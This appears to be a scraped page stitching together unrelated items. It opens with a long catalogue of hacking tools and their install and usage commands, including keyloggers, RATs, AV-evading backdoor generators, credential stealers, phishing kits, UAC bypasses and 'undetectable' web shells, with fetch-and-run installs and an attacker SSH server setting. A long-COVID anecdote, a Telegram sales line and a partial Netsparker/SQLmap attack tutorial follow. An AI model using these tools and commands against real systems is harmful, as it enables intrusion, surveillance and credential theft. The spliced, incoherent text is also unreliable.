
  1. Anti Forensics Tools

     AudioStego - Audio file steganography. Hides files or text inside audio files and retrieves them automatically
     Installation:
         sudo apt-get install libboost-all-dev
         git clone https://github.com/danielcardeenas/AudioStego.git
         cd AudioStego
         mkdir build
         cd build
         cmake ..
         make

     dban - Hard Drive Eraser & Data Clearing Utility
     Installation: https://sourceforge.net/projects/dban/

     OpenStego - The free steganography solution
     Download: https://sourceforge.net/projects/openstego/

     srm - srm (secure rm) is a command-line program to delete files securely
     Download: https://sourceforge.net/projects/srm/

     Steghide - Steganography program that is able to hide data in various kinds of image- and audio-files
     Download: steghide.sourceforge.net

     Exploitation Tools

     Auto-Root-Exploit - Find exploits on Linux Kernel
     Installation:
         git clone https://github.com/nilotpalbiswas/Auto-Root-Exploit/
         cd Auto-Root-Exploit
     Usage: bash auto-root.sh

     AutoSploit - Automated Mass Exploiter
     Installation:
         git clone https://github.com/NullArray/AutoSploit
         cd AutoSploit
         chmod +x install.sh
         ./install.sh
     Usage: python autosploit.py

     beef - The Browser Exploitation Framework Project
     Website: https://beefproject.com/
     Installation:
         sudo apt install beef-xss
     Usage: beef
     Web Panel:

     BeRoot - Find a way to escalate our privilege (linux)
     Installation:
         git clone https://github.com/AlessandroZ/BeRoot/
         cd BeRoot/Linux
     Usage: python beroot.py

     CrackMapExec - A swiss army knife for pentesting networks
     Installation:
         apt-get install -y libssl-dev libffi-dev python-dev build-essential
         git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
         cd CrackMapExec
         pip3 install -r requirements.txt
         python3 setup.py install
     Usage: crackmapexec

     DccwBypassUAC - Windows 8.1 and 10 UAC bypass abusing WinSxS in "dccw.exe"
     Download: https://github.com/L3cr0f/DccwBypassUAC/blob/release/DccwBypassUAC/Release/DccwBypassUAC.exe
     Usage: C:\Users\L3cr0f> DccwBypassUAC.exe

     Invoke-PSImage - Embeds a PowerShell script in the pixels of a PNG file
     Download: peewpw/Invoke-PSImage (github.com)

     KeeFarce - Extracts passwords from a KeePass 2.x database, directly from memory
     Installation (Windows):
         C:> curl -LO https://github.com/denandz/KeeFarce/blob/master/prebuilt/x64.zip

     koadic - C3 COM Command & Control
     Installation:
         git clone https://github.com/zerosum0x0/koadic.git
         cd koadic
         pip3 install -r requirements.txt
         ./koadic

     meterssh - Inject shellcode into memory and tunnel port over SSH (windows)
     Installation:
         git clone https://github.com/trustedsec/meterssh
         cd meterssh
         nano meterssh.py
     Edit:
         user = "sshuser"
         # password for SSH
         password = "sshpw"
         # this is where your SSH server is running
         rhost = ""
         # remote SSH port - this is the attackers SSH server
         port = "22"

     PowerShell-Suite - Collection of PowerShell utilities (windows)
     Download: https://github.com/FuzzySecurity/PowerShell-Suite

     UACME - Defeating Windows User Account Control 60+ Methods (windows)
     Download: https://github.com/hfiref0x/UACME
     Usage:
         akagi32.exe 1
         akagi64.exe 3
         akagi32 1 c:\windows\system32\calc.exe
         akagi64 3 c:\windows\system32\charmap.exe

     WinPwnage - Elevate, UAC bypass, privilege escalation, dll hijack techniques
     Installation:
         git clone https://github.com/rootm0s/WinPwnage
         cd WinPwnage
         pip install -r requirements.txt
         pip install pyinstaller
         pyinstaller --onefile main.py
     Usage: main.py --scan uac

     Forensics Tools

     Autopsy - Digital forensics platform
     Installation: apt-get install autopsy -y

     bulk_extractor - Scans a disk image, a file, or a directory of files
     Installation: apt-get install bulk-extractor bulk-extractor-dbgsym -y

     Scalpel - Open source data carving tool
     Installation: apt-get install scalpel -y

     volatility - Volatile memory extraction utility framework
     Installation: apt-get install volatility volatility-tools -y

     binwalk - A fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images
     Installation: apt-get install binwalk -y

     Catfish - Versatile file searching tool
     Installation: apt-get install catfish -y

     dc3dd - A patched version of GNU dd with added features for computer forensics
     Installation: apt-get install dc3dd -y

     DumpsterDiver - Analyze big volumes of various file types in search of hardcoded secrets
     Installation:
         git clone https://github.com/securing/DumpsterDiver
         cd DumpsterDiver
         pip install -r requirements.txt
     Usage: python3 DumpsterDiver.py

     frida-extract - Based RunPE extraction tool
     Installation:
         git clone https://github.com/OALabs/frida-extract
         cd frida-extract
         OR
         pip install frida
     Usage: python FridaExtract.py bad.exe

     Image-ExifTool - Read, Write and Edit Exif metadata
     Installation: apt-get install libimage-exif-perl libimage-exiftool-perl -y

     whatsapp-viewer - Small tool to display chats from the Android msgstore.db database (windows)
     Installation:
         C:> curl -LO https://github.com/andreas-mausch/whatsapp-viewer/releases/download/v1.12/WhatsApp.Viewer.zip
         Unzip and run WhatsAppViewer.exe

     Information Gathering

     bing-ip2hosts - Enumerate hostnames from Bing
     Installation:
         apt-get install bing-ip2hosts
     Github: https://github.com/urbanadventurer/bing-ip2hosts
     Usage: bing-ip2hosts -o results.txt -u github.io
     Replace github.io with website.

     datasploit - OSINT Framework to perform various recon techniques
     Installation:
         pip install --upgrade --force-reinstall -r requirements.txt
         git clone https://github.com/DataSploit/datasploit
         cd datasploit
         pip install --upgrade -r requirements.txt && while read line; do pip install $line; done < requirements.txt
         sed -i 's/dep_check.check_dependency()/#/g' datasploit.py
         sed -i 's/import dep_check/#/g' datasploit.py
     Usage: python2 datasploit.py -i target.com

     dnsenum - Perl script that enumerates DNS information
     Installation: apt-get install dnsenum

     dnsmap - Subdomain brute-forcing
     Installation: apt-get install dnsmap

     dnsrecon - DNS Enumeration Script
     Installation: apt-get install dnsrecon

     dork-cli - Command-line Google dork tool
     Installation:
         git clone https://github.com/jgor/dork-cli
         cd dork-cli
         chmod +x dork-cli.py
     Usage: ./dork-cli.py inurl:login

     dorks - Google hack database automation tool
     Installation:
         git clone https://github.com/USSCltd/dorks
         cd dorks
         apt-get install phantomjs
     Usage: phantomjs ghdb -q linux -o linux_dorks.txt
     Usage: phantomjs google -d inurl:upload.php -t 5 -T 3

     pagodo - Automate Google Hacking Database scraping
     Installation:
         git clone https://github.com/opsdisk/pagodo.git
         cd pagodo
         pip install -r requirements.txt
         apt install proxychains4 -y
     Usage: proxychains4 python3 pagodo.py -g ALL_dorks.txt -s -e 17.0 -l 700 -j 1.1
     Usage: python3 ghdb_scraper.py -j -s
     Note: edit proxychains by yourself

     faraday - Collaborative Penetration Test and Vulnerability Management Platform
     Installation: apt-get install faraday -y

     fierce - DNS Analysis perl script
     Installation: apt-get install fierce -y

     hping - Network tool able to send custom TCP/IP packets
     Installation: apt-get install hping3

     knock - Subdomain Scan
     Installation:
         sudo apt-get install python-dnspython
         git clone https://github.com/guelfoweb/knock.git
         cd knock
         nano knockpy/config.json (set up your virustotal.com api key here)
         sudo python setup.py install
     Usage: knockpy website.com

     masscan - Fast TCP port scanner
     Installation: apt-get install masscan

     metagoofil - Document and metadata reconnaissance (updated version)
     Installation: apt-get install metagoofil

     onioff - An onion url inspector for inspecting deep web links
     Installation:
         git clone https://github.com/k4m4/onioff.git
         cd onioff
         pip3 install -r requirements.txt
     Usage: python3 onioff.py http://xmh57jrzrnw6insl.onion/
     Usage: python3 onioff.py -f urllist.txt -o report.txt

     OSINT-SPY - Performs OSINT scan on email/domain/ip_address/organization
     Installation:
         git clone https://github.com/SharadKumar97/OSINT-SPY.git
         cd OSINT-SPY
         pip install -r requirements.txt
     Setup:
     API Websites:
         https://account.shodan.io/register | config: shodan_api_key
         https://dashboard.fullcontact.com/register | config: fullcontact_api_key
         https://www.virustotal.com/gui/join-us | config: virus_total_api_key
         https://hunter.io/users/sign_up | config: email_hunter_api_key
     Info BTC Owner: python osint-spy.py --btc_address 1DST3gm6JthxhuoNKFqXrdpzPFfz1WgHpW --json
     Info Website: python osint-spy.py --domain google.com --json
     Vuln Webcam: python osint-spy.py --device webcam --json
     Email Info: python osint-spy.py --email test@viperzcrew.com --json

     SimplyEmail - Email recon made fast and easy
     Installation:
         git clone --branch dev https://github.com/killswitch-GUI/SimplyEmail.git
         cd SimplyEmail
         ./setup/setup.sh
         cd ..
         cd SimplyEmail
     Usage:
         ./SimplyEmail.py -all -e viperzcrew.com
         ./SimplyEmail.py -all -v -verify -e viperzcrew.com

     spiderfoot - OSINT collection and reconnaissance tool
     Installation:
         git clone https://github.com/smicallef/spiderfoot.git
         cd spiderfoot
         pip3 install -r requirements.txt
     Usage: python3 sf.py
     Web: python3 sf.py -l

     surfraw - a fast UNIX command line interface to a variety of popular WWW search engines
     Installation: apt-get install surfraw -y

     TekDefense-Automater - IP URL and MD5 OSINT Analysis
     Installation:
         git clone https://github.com/1aN0rmus/TekDefense-Automater.git
         cd TekDefense-Automater
     Usage:
         Auto: python Automater.py <ip address>
         Normal: python Automater.py -o result.txt -d 5 <ip address>

     theHarvester - E-mails, subdomains and names Harvester - OSINT
     Installation:
         git clone https://github.com/laramies/theHarvester
         cd theHarvester
         apt-get install python3-dev python3-pip -y
         pip3 install -r requirements/base.txt
         pip3 install -r requirements/dev.txt
         python3 setup.py || python3 setup.py install
     If the above pip3 commands are not working, try this:
         while read line; do pip3 install $line; done < requirements/base.txt
         while read line; do pip3 install $line; done < requirements/dev.txt
     Usage: python3 theHarvester.py -d viperzcrew.com -l 500 -S 0 -g --dns-server -n -c -f result.txt -b all

     trape - People tracker on the Internet: OSINT analysis and research tool by Jose Pino
     Installation:
         git clone https://github.com/jofpin/trape.git
         cd trape
         pip2 install -r requirements.txt
     If you have ngrok token:
         python2 trape.py --ngrok <token>
         python2 trape.py --port 6666 --url viperzcrew.com

     WhatWeb - Web scanner
     Installation: apt-get install whatweb -y

     xray - A tool for recon, mapping and OSINT gathering from public networks
     Installation:
         git clone https://github.com/evilsocket/xray.git
         cd xray
         make
     Usage: xray -shodan-key yourshodaniapi -domain domain

     zmap - Fast single packet network scanner
     Installation: apt-get install zmap -y
     Usage: zmap -p 21 -o result.txt -i <interface> --vpn --ignore-invalid-hosts
     --vpn if you are using vpn!

     Keyloggers

     BeeLogger - Generate Gmail Emailing Keyloggers to Windows
     Installation:
         git clone https://github.com/4w4k3/BeeLogger.git
         cd BeeLogger
         sudo chmod +x install.sh
         ./install.sh
         python2 bee.py

     Keylogger - A simple keylogger for Windows, Linux and Mac
     Installation: pip install keylogger
     Usage: keylogger

     Radium-Keylogger - Python keylogger with multiple features
     Installation:
         git clone https://github.com/mehulj94/Radium
         cd Radium
         pip2 install -r requirements.txt
         python2 Radiumkeylogger.

     Maintaining Access

     EggShell - iOS/macOS/Linux Remote Administration Tool
     Installation:
         git clone https://github.com/neoneggplant/eggshell
         cd eggshell
     Usage: python eggshell.py

     EvilOSX - An evil RAT (Remote Administration Tool) for macOS / OS X
     Installation:
         git clone https://github.com/Marten4n6/EvilOSX
         cd EvilOSX
         sudo pip install -r requirements.txt
     Usage: python start.py

     Metasploit - The world's most used penetration testing framework
     Installation: sudo apt-get install metasploit -y

     Parat - Python based Remote Administration Tool (RAT)
     Installation:
         git clone https://github.com/micle-fm/Parat && cd Parat
     Usage: python main.py

     pupy - An opensource, cross-platform, multi function RAT
     Installation:
         git clone --recursive https://github.com/n1nj4sec/pupy
         cd pupy
         sudo chmod +x *
         ./create-workspace.py pupyws

     QuasarRAT - Remote Administration Tool for Windows
     Download: https://github.com/quasar/Quasar/releases/download/v1.4.0/Quasar.v1.4.0.zip
     Setup: https://github.com/quasar/Quasar/wiki

     tgcd - TCP/IP Gender Changer Daemon
     Download: https://sourceforge.net/projects/tgcd/

     TheFatRat - An Easy tool to Generate Backdoor for bypass AV
     Installation:
         git clone https://github.com/Screetsec/TheFatRat.git
         cd TheFatRat
         chmod +x setup.sh && ./setup.sh

     Veil - Tool designed to generate metasploit payloads that bypass common anti-virus solutions
     Installation:
         sudo apt-get -y install git
         git clone https://github.com/Veil-Framework/Veil.git
         cd Veil/
         ./config/setup.sh --force --silent

     WMImplant - PowerShell based tool that is designed to act like a RAT
     Download: https://github.com/FortyNorthSecurity/WMImplant

     AhMyth - Android RAT
     Download: https://github.com/AhMyth/AhMyth-Android-RAT/releases

     Password Attacks

     BEWGor - Bull's Eye Wordlist Generator
     Installation:
         git clone https://github.com/berzerk0/BEWGor
         cd BEWGor
     Usage: python BEWGor.py -input

     bruteforce-wallet - Try to find the password of an encrypted Peercoin (or Bitcoin, Litecoin, etc...) wallet file
     Installation:
         git clone https://github.com/glv2/bruteforce-wallet
         cd bruteforce-wallet
         apt install libdb-dev libssl-dev -y
         ./autogen.sh
         ./configure && make; make install
     Usage: bruteforce-wallet -t 6 -f dictionary.txt wallet.dat

     chntpw - Utility to reset the password on Windows
     Installation: apt-get install chntpw

     chromepass - View passwords stored by Google Chrome Web browser
     Download: https://www.nirsoft.net/utils/chromepass.html

     crowbar - Brute forcing tool
     Installation: sudo apt install -y crowbar nmap openvpn freerdp2-x11 tigervnc-viewer python3 python3-pip -y

     cupp - Common User Passwords Profiler
     Installation:
         git clone https://github.com/Mebus/cupp
         cd cupp
         python3 setup.py || python3 setup.py install
     Usage: python3 cupp.py -i

     hashcat - Advanced Password Recovery
     Installation: apt-get install hashcat -y

     John the Ripper - A fast password cracker
     Installation: sudo apt-get install john -y

     LaZagne - Credentials recovery project
     Installation:
         git clone https://github.com/AlessandroZ/LaZagne
         cd LaZagne
         pip install -r requirements.txt
         cd Linux
     Usage: python laZagne.py all

     mimikatz - A little tool to play with Windows security
     Download: https://github.com/gentilkiwi/mimikatz/releases

     passwordfox - Extract the user names/passwords stored in Firefox
     Download: https://www.nirsoft.net/utils/passwordfox.html

     fcrackzip - A braindead program for cracking encrypted ZIP archives
     Installation:
         git clone https://github.com/hyc/fcrackzip
         cd fcrackzip
         ./configure || configure
         make; make install
     Usage: fcrackzip -b -c a -p aaaaaa ./noradi.zip

     SSH-Brute-Forcer - A Simple Multi-Threaded SSH Brute Forcer
     Installation:
         git clone https://github.com/R4stl1n/SSH-Brute-Forcer
         cd SSH-Brute-Forcer
         pip install -r requirements.txt
         cd src
     Usage: python SSHBruteForce.py -i -d True -p 2222 -U ./usernames.txt -P ./passwords.txt

     WCE - Windows Credentials Editor
     Download: https://github.com/returnvar/wce/releases

     Reverse Engineering

     IDA - Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger
     Download: https://ida.winsite.com/

     OllyDBG - A 32-bit assembler level analysing debugger for Microsoft Windows
     Download: https://sourceforge.net/projects/x64dbg/

     Resource Hacker - A freeware resource compiler & decompiler for Windows applications
     Download: http://angusj.com/resourcehacker/

     apktool - A tool for reverse engineering Android apk files
     Installation: apt-get install apktool -y

     smali - smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Android's Java VM implementation
     Download: https://bitbucket.org/JesusFreke/smali/downloads/

     Sniffing Spoofing

     Ettercap - A comprehensive suite for man in the middle attacks
     Installation: apt-get install ettercap

     bettercap - The Swiss Army knife for 802.11, BLE and Ethernet networks reconnaissance and MITM attacks
     Installation: apt-get install bettercap -y

     macchanger - Utility that makes the manipulation of MAC addresses of network interfaces easier
     Installation: apt-get install macchanger -y

     mitmproxy - Free and open source interactive HTTPS proxy
     Installation: apt-get install mitmproxy -y

     mkcert - Make locally trusted development certificates with any names you'd like
     Installation:
         git clone https://github.com/FiloSottile/mkcert
         cd mkcert
         apt install libnss3-tools
         go build -ldflags "-X main.Version=$(git describe --tags)"
     Usage: mkcert -key-file key.pem -cert-file cert.pem example.com *.example.com

     sslstrip - SSL/TLS man-in-the-middle attack tool
     Installation: apt-get install sslstrip -y

     Wireshark - The world's foremost and widely-used network protocol analyzer
     Installation: apt-get install wireshark -y

     moloch - An open source, large scale, full packet capturing, indexing, and database system.
     Installation:
         git clone https://github.com/aol/moloch
         ./easybutton-build.sh --install
         make config

     Social Engineering

     evilginx2 - Standalone man-in-the-middle attack framework
     Installation:
         sudo apt-get install git make
         go get -u github.com/kgretzky/evilginx2
         cd $GOPATH/src/github.com/kgretzky/evilginx2
         make
     Usage: sudo ./evilginx -d

     Gophish - Open-Source Phishing Framework
     Download: https://github.com/gophish/gophish/releases/

     HiddenEye - Modern phishing tool with advanced functionality
     Installation:
         git clone https://github.com/DarkSecDevelopers/HiddenEye.git
         chmod +x
         cd HiddenEye
         sudo apt install python3-pip
         sudo pip3 install -r requirements.txt
         sudo pip3 install requests
         sudo pip3 install pyngrok
     Usage: python3 HiddenEye.py

     king-phisher - Phishing Campaign Toolkit
     Installation: apt-get install king-phisher -y

     ReelPhish - A Real-Time Two-Factor Phishing Tool
     Installation:
         git clone https://github.com/fireeye/ReelPhish
         cd ReelPhish
         pip install -r requirements.txt
     Usage: python2 ReelPhish.py --browser FF --logging debug --submit
     Browser:

     social-engineer-toolkit - Open-source penetration testing framework designed for social engineering
     Installation:
         git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/
         cd setoolkit
         pip3 install -r requirements.txt
         python setup.py
     Usage: setoolkit

     Vulnerability Analysis

     Am-I-affected-by-Meltdown - Meltdown Exploit - Proof-of-concept
     Installation:
         git clone https://github.com/raphaelsc/Am-I-affected-by-Meltdown.git
         cd ./Am-I-affected-by-Meltdown
         make
         taskset 0x1 ./meltdown-checker

     CMSmap - python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs
     Installation:
         git clone https://github.com/Dionach/CMSmap
         cd CMSmap
         pip3 install .
     Usage: cmsmap

     linux-exploit-suggester - Linux privilege escalation auditing tool
     Installation:
         wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
     Usage: ./linux-exploit-suggester.sh

     Lynis - Auditing tool for Unix-based systems
     Installation:
         git clone https://github.com/CISOfy/lynis
         cd lynis; ./lynis audit system

     Nmap - The Network Mapper
     Installation: apt-get install nmap -y

     sqlmap - Automatic SQL injection and database takeover tool
     Installation: apt-get install sqlmap -y

     unix-privesc-check - Shell script to check for simple privilege escalation vectors on Unix systems
     Installation: apt-get install unix-privesc-check -y

     Wapiti - The web-application vulnerability scanner
     Installation: apt-get install wapiti -y

     wesng - Windows Exploit Suggester - Next Generation
     Installation:
         git clone https://github.com/bitsadmin/wesng
         cd wesng
         python setup.py || python setup.py install
     Usage: python wes.py --update

     Mobile Security Framework (MobSF) - Mobile Security Framework is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing framework
     Installation:
         sudo apt-get install python3.7 openjdk-8-jdk
         sudo apt install python3-dev python3-venv python3-pip build-essential libffi-dev libssl-dev libxml2-dev libxslt1-dev libjpeg8-dev zlib1g-dev wkhtmltopdf
         git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF
         cd Mobile-Security-Framework-MobSF
         ./setup.sh

     Web Applications

     Burp Suite - Web vulnerability scanner
     Installation: apt-get install burpsuite -y

     CLOUDKiLL3R - Bypasses Cloudflare protection service via TOR Browser using crimeflare !
     Installation:
         git clone https://github.com/inurlx/CLOUDKiLL3R
         cd CLOUDKiLL3R
         pip install argparse
         pip install socks
         pip install socket
         pip install requests
         pip install sys
     Usage: python CK.py

     Nikto - Web server scanner
     Installation: apt-get install nikto -y

     owtf - Offensive Web Testing Framework (OWTF)
     Installation:
         git clone https://github.com/owtf/owtf
         cd owtf
         python setup.py develop
     Usage: otf
     Browser: localhost:8080

     wafw00f - Fingerprint Web Application Firewall (WAF)
     Installation: apt-get install wafw00f

     w3af - Web Application Attack and Audit Framework
     Installation: apt-get install w3af -y

     Wfuzz - Web application fuzzer
     Installation: apt-get install wfuzz

     WhatWaf - Detect and bypass web application firewalls and protection systems

     WPscan - WordPress vulnerability scanner
     Installation: apt-get install wpscan -y

     Web Shells

     weevely3 - Weaponized web shell
     Installation:
         git clone https://github.com/epinna/weevely3
         cd weevely3
         pip3 install -r requirements.txt
     Usage: python3 weevely3

     b374k - PHP Webshell with handy features
     Installation:
         git clone https://github.com/b374k/b374k
         cd b374k
     Usage: php -f index.php
     Ex: php -f index.php -- -o myShell.php -p myPassword -s -b -z gzcompress -c 9

     Miyachung - PHP BackConnect Shell
     Download: https://packetstormsecurity.com/files/download/122612/miyabc.php.txt
     (rename from php.txt to php)

     wso-2.8-web-shell - Automatically exported from code.google.com/p/wso-web-shell-2-8
     Download: https://github.com/rzkyh007/wso-web-shell-2-8/blob/master/WSO2.8_undetectable.php

     Wireless Attacks

     Aircrack-ng - A complete suite of tools to assess WiFi network security
     Installation: apt-get install aircrack-ng

     airgeddon - Multi-use bash script for Linux systems to audit wireless networks
     Installation:
         git clone --depth 1 https://github.com/v1s1t0r1sh3r3/airgeddon.git
         cd airgeddon
         sudo bash airgeddon.sh

     Bluelog - A highly configurable Linux Bluetooth scanner
     Installation: apt-get install bluelog -y

     fluxion - Fluxion is a remake of linset by vk496 with less bugs and enhanced functionality
     Installation:
         wget https://raw.githubusercontent.com/FluxionNetwork/fluxion/master/install/install.sh && bash install.sh

     infernal-twin - This is automated wireless hacking tool
     Installation:
         git clone https://github.com/entropy1337/infernal-twin
         cd infernal-twin
         chmod +x *
         ./InfernalWireless.py

     kismet - An 802.11 layer2 wireless network detector, sniffer, and intrusion detection system
     Installation: apt-get install kismet -y

     krackattacks-scripts - WPA2 Krack Attack Scripts
     Installation:
         apt-get update
         apt-get install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils python-scapy python-pycryptodome virtualenv
         git clone https://github.com/vanhoefm/krackattacks-scripts
         cd krackattacks-scripts/hostapd
         cp defconfig .config
         make -j 2
         cd ..; cd krackattack
         pip install -r requirements.txt
     Usage: ./krack-test-client.py --replay-broadcast

     KRACK Detector - Detect and prevent KRACK attacks in your network
     Installation:
         git clone https://github.com/securingsam/krackdetector
         cd krackdetector
     Usage: python krack_detect.py <interface>
     Usage: python krack_detect.py wlan0

     Pixiewps - An offline Wi-Fi Protected Setup brute-force utility
     Installation: apt-get install pixiewps -y

     RouterSploit - Exploitation Framework for Embedded Devices
     Installation: apt-get install routersploit -y

     wifi-arsenal - Resources for WiFi Pentesting
     Link: https://github.com/0x90/wifi-arsenal
     Do not clone, it will overfill your space xD

     Wifiphisher - The Rogue Access Point Framework
     Installation: apt-get install wifiphisher -y

     WiFi-Pumpkin - Framework for Rogue Wi-Fi Access Point Attack
     Installation:
         sudo apt install libssl-dev libffi-dev build-essential
         git clone https://github.com/P0cL4bs/wifipumpkin3.git
         cd wifipumpkin3
         sudo apt install python3-pyqt5
         sudo python3 setup.py install
     Usage: wifipumpkin3

     THIS WAS COLLECTED BY LINKS, INSTALLATION PROGRESS ETC... !
  2. The story of one patient

     About a year ago, one of my acquaintances did not mind getting sick with coronavirus. His naive delusions in the absence of dangers for the lives of young people were pretty much seasoned with the cheerful stories of friends who had recovered from illness, who got off with a slight cold. How wrong he was. Most likely, it was just frivolity and not enough frequent hand washing that ultimately led to his natural infection.

     So, a couple of months ago, a friend was diagnosed with a coronavirus. I do not know what this is connected with, the specifics of the organism, or a mutated strain of the virus itself, but his experience of the disease was very painful and no less prolonged.

     It all started in the classics. Mild fever, sore throat. At first glance - an easy form, and he felt great. But on the 3rd day of illness, terrible things began to happen to him. Trying to sleep at night, the comrade noticed that something was wrong with him. He got out of bed and realized that he was losing consciousness. Buzz in the ears, darkening in the eyes, legs do not hold. Of course, he immediately thought he was going to die. But still he stayed on his feet. Raised low blood pressure with sugar tea and somehow managed to fall asleep.

     In the morning, an acquaintance was literally smeared - the most severe phase of the disease began. In a nutshell - you cannot do anything and lie dumbly. I don't even want to look at the smartphone screen, and the temperature goes off scale. Feels like your brain is melting. Thoughts are intertwined and you cannot formulate anything, delusional, unrelated ideas appear.

     Then everything calmed down and real mind games began. His health became much better, but an incomprehensible chest discomfort appeared. The obvious onset of pneumonia, which is probably the most unpleasant sensation from covid. You seem to be breathing, but at the same time you understand that you are half full of strength. This is aggravated by anxiety and panic measurements of blood oxygen levels every 15 minutes. The most unpleasant thing is that from all this discomfort you fall into a state of permanent anxiety, an obsessive fear of death appears and you cannot sleep normally.

     Pneumonia has passed - we meet a new misfortune! Sharp chest pains. After such a call on another sleepless night, he rushed into the cardiologist's office with his feet. Total - a heart like a bull, no violations were found. As it turned out, the friend started intercostal neuralgia. It hurts clearly in the same place where the heart should be and terribly interferes with sleep. The worst thing is that she accompanies him to this day.

     Postcovid Syndrome

     My acquaintance once again pulled out a "lucky" ticket and was among those 20% of people to whom the disease became attached an order of magnitude longer than the promised two weeks. So, what exactly is this postcovid syndrome? Roughly speaking, this is when the symptoms of the disease last more than 12 weeks. At the same time, the disease in you, as it were, is no longer there, and antibodies have long been developed. These are muscle spasms, and that very heavy breathing, and digestive problems and a bunch of other things, you can read the full list yourself on the Internet, and I will tell you which of these symptoms have remained with him to this day.

     First of all, the coronavirus hit his psyche in the most serious way. He seems to be breathing normally, but psychosomatics does not leave. Comrade still, every night, looks at his breathing and is paranoid about the fact that he is breathing badly.

     Let's go further. As for neuralgia, everything seems to be clear, she is not going to disappear. On the assurance of a friend, chest pains are still weakened, but very successfully manifested before bedtime.

     As for the taste and smell, they disappeared, but after a week they returned successfully. But literally this month, his perception of smells flew to hell. Now he constantly tastes strange after eating. The comrade perfectly feels the tastes - salty, sweet, but the strange smell is annoying. It does not work on all food, but for example on meat, coffee and a whole bunch of other things. It looks like a rotten chicken roll and freezes terribly. Something I can't quite imagine such a smell, but it feels disgusting. He is not sure if the covid is related to this, but for six months, he did not have any other health problems.

     What is all this shit about?

     Basically, all the consequences of postcovid are due to a violation of the nervous system. The virus is so powerful that it disrupted the functioning of the olfactory nerve, which is responsible for smell, and a bunch of other nerves. There is an imbalance of the two nerve systems - the parasympathetic and the sympathetic, which is why sleep problems, anxiety, tachycardia, and fear of death arise. The worst thing is that there is no way to cure postcovid syndrome. It can only be endured, and it is not clear how long it will take to suffer.

     Outcome

     I am very afraid of this disease and do not want to go through what my good friend recently suffered. I will not urge you to wear masks and wash your hands, decide for yourself. I just wanted to share an interesting and alternative experience. Although the crown does not kill young people, it leaves a huge imprint on the nervous system. His case is to prove to you. Now I am trying to heal my comrade with meditation. Let me know if it works. That's all for me, write about your experience of fighting the crown, and especially those who have become victims of the post-coccygeal symptom.
  3. I sell it no longer message on the @krrrbaw telegram to have it
  4. In previous articles, we have already talked about how to test a site for vulnerabilities using the simplest tools.Today we will work with professional software. Namely with Netsprker and SQLmap. It's time to get rid of the pacifier, which is played by programs such as Webcruiser and Albaloo. To begin with, I suggest downloading everything that we will use throughout the article.It is impossible not to mention that this particular "bundle" was used in 2016 by the American hacker Ray Buttler right from prison and achieved impressive results by opening several clandestine "shops" and bitcoin exchanges. Gone are the days, but do not forget that 19% of web applications have vulnerabilities that allow them to gain control over both the application itself and the server OS. Netsparker will find them.We will consider working with the software under Windows, since NetSparker works only on this platform. However, the author recommends using Kali Linux and NetSparker on a virtual machine.Netsparker - The version I'm using.Netsparker - Newer than mine, but generally no different except for possible additional functionality), so this article should be relevant for this version ofSQLmap git or Sqlmap Git rarPython 2.7 (for working with SQLmap)Burp SuiteWhy exactly Netsprker and SQLmap?NetSparker is a powerful scanner, SqlMap is a console tool for exploiting found vulnerabilities.Netsparker is a powerful scanner of online resources, sites and web applications for errors, vulnerabilities and minor bugs. In the course of work, he generates a report, describing in as much detail as possible each part of the scanned resource, drawing up its “map”. Flexible settings, an intuitive interface, prompts and a huge base of vulnerabilities, plus a unique tool for detecting false positives, make this tool the de facto leader in the industry. 
It also has disadvantages: NetSparker is a heavyweight, scanning a resource can take hours, but at the same time the “sparker” will run the site and all its applications for all possible and impossible variants of vulnerabilities.NetSparker is far from the only tool of this kind, there are other good scanners like ZAP, which I will talk about next time.Since, before proceeding directly to exploitation, vulnerabilities must be discovered, therefore, first we will talk about Netsparker. Next, we will look at the basic principles of attacking these vulnerabilities using SQLmap.In order to open the program, you need to double-click on the Netsparker.exe file. After starting the program, we see the following: The start window of the program has six sections, which we should consider: 1 - Field for entering the crawled site. The button built into the input field (the rightmost one, with a green arrow) opens the site that we introduced earlier. Also netsparker remembers the sites that we have already scanned and by clicking on the down arrow, which is located slightly to the left of the button, we can see them. It is very convenient if you suddenly need to go back to rescanning previous sites. 2 - For each crawled site, the program remembers the settings (which we will consider below), and this item allows you to save and select the crawl settings for the selected site. As follows: Save Profile - Save settings Save As New Profile - Save settings for this scan separately Default - Standard scan Previous Settings - Previous scan settings 3 - Site scan settings 4 - Authentication settings on the crawled site. An optional menu, but very useful if you need to scan a resource through your personal account 5 - Field of settings for each item of the third and fourth menus 6 - Start button and cancel button. It is worth mentioning that this item also has its own “settings” window: Start Scan - Getting started. 
No problems.
Crawl and Wait - Crawl without attacks.
Manual Crawl (Proxy Mode) - The same quiet mode, but through a proxy. I must warn you that you will need to install the certificate:
Scan Imported Links Only - Scans only specific links.
Schedule Scan - Scheduled scanning.

Now that we have gone through the interface, it's time to start a detailed study of the menu items. First, let's look at the third section - Scan Settings. We see five items in total. Let's consider them in order.

General

Basic settings. Let's start by looking at Scan Policy. These are the rules by which the resource will be scanned. Using this item, you can optimize the scan if you already have any information about the target. To do this, click on the button that resembles a magic wand:

The following menu opens:

This is the welcome window. You can skip it. We look further.

Here we select the operating system installed on the scanned server.

In this window, we have to select the server installed on the scanned machine.

The fourth window is the choice of the language in which the applications of the scanned resource are written. You can select several at once if you are not sure.

In this window, select the database that the scanned resource uses. You can choose several if you are not sure.

At this stage, we indicate the amount of dynamic content on the site:
Little or no dynamic content - there is little dynamic content, or it is decorative, that is, it does not interact in any way with the back-end of the
Moderately sized dynamic web site - there is a lot of dynamic content and pages with it. Most sites fall into this category.
Complex Single-Page-Application - Complex applications that update the content of one page.

The seventh window is the search for hidden content. Netsparker enumerates the possible names of content on the remote server. Here it is possible to set a search limit.
The last window is a report of the parameters we selected earlier.
Scan Policy Name - the name of the policy we created / optimized.

Click Finish, and in the main menu of the scan settings we can select our policy. It usually becomes active by default.

The next thing we will look at in the main menu is the Report Policy. These are the items on which the program will report. If it is important for you to know only one detail, for example, whether the target is vulnerable to SQL injection, click on the three dots and, from the entire list, leave only SQL injection checked:

